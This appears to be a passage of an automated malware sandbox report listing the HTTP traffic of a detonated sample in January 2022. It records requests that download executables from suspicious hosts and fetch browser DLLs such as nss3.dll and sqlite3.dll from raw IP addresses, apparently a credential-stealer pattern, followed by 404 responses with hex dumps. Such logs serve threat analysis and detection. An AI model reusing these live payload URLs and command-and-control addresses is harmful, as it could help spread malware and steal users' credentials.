                      Source: global trafficHTTP traffic detected: GET /files/8584_1641133152_551.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /POeNDXYchB.php HTTP/1.1Host: 185.7.214.239Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /crp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: f0616068.xsph.ru
                      Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: 185.7.214.239Cache-Control: no-cacheCookie: PHPSESSID=9tonum6b55n3ncs7ru7lrdrlt3
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: vk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: natribu.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: natribu.org
                      Source: global trafficHTTP traffic detected: GET /files/2972_1641266367_4755.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /lava.exe HTTP/1.1Host: f0616071.xsph.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Music.exe HTTP/1.1Host: f0616073.xsph.ruConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ed a1 88 70 bc 57 dd 43 d4 fa 20 87 20 e7 c3 9a 57 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC W*c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
